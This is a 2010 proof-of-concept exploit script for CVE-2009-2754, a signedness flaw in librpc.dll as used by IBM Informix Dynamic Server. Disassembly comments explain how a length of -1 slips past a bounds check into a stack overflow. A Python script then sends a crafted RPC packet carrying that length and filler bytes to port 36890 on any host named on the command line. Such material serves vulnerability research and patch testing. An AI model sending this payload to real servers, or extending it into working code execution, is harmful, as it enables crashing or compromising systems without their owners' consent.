# Exploit Title: ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability
# Date: 2010-04-08
# Author: ZSploit.com
# Software Link: N/A
# Version: N/A
# Tested on: IBM Informix Dynamic Server 10.0
# CVE : CVE-2009-2754
#! /usr/bin/env python
###############################################################################
## File : zs_ids_rpc.py
## Description:
## :
## Created_On : Mar 21 2010
##
## (c) Copyright 2010, ZSploit.com. all rights reserved.
###############################################################################
"""
The issue in __lgto_svcauth_unix():
.text:1000B8E1 mov [ebp+0], eax
.text:1000B8E4 mov eax, [ebx]
.text:1000B8E6 push eax ; netlong
.text:1000B8E7 add ebx, 4
.text:1000B8EA call esi ; ntohl ; Get length of hostname
.text:1000B8EC cmp eax, 0FFh ; Signedness error, if we give 0xffffffff(-1) will pass this check
.text:1000B8F1 jle short loc_1000B8FD
.text:1000B8F3 mov esi, 1
.text:1000B8F8 jmp loc_1000B9D5
.text:1000B8FD ; ---------------------------------------------------------------------------
.text:1000B8FD
.text:1000B8FD loc_1000B8FD: ; CODE XREF: __lgto_svcauth_unix+71j
.text:1000B8FD mov edi, [ebp+4]
.text:1000B900 mov ecx, eax
.text:1000B902 mov edx, ecx
.text:1000B904 mov esi, ebx
.text:1000B906 shr ecx, 2
.text:1000B909 rep movsd ; call memcpy here with user-supplied size cause a stack overflow
.text:1000B90B mov ecx, edx
.text:1000B90D add eax, 3
.text:1000B910 and ecx, 3
.text:1000B913 rep movsb
"""
import sys
import socket
if (len(sys.argv) != 2):
print "Usage:\t%s [target]" % sys.argv[0]
sys.exit(0)
data = "\x80\x00\x00\x74\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02" \
"\x00\x01\x86\xb1\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01" \
"\x00\x00\x00\x4c\x00\x00\xd6\x45\xff\xff\xff\xff\x41\x41\x41\x41" \
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x0a\x42\x42\x42\x42\x42\x42\x42\x42" \
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \
"\x00\x00\x00\x00\x00\x00\x00\x00"
host = sys.argv[1]
port = 36890
print "PoC for ZDI-10-023 by ZSploit.com"
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host, port))
s.send(data)
print "Sending payload .."
except:
print "Error in send"
print "Done"
except:
print "Error in socket"
The ZSploit Team
http://zsploit.com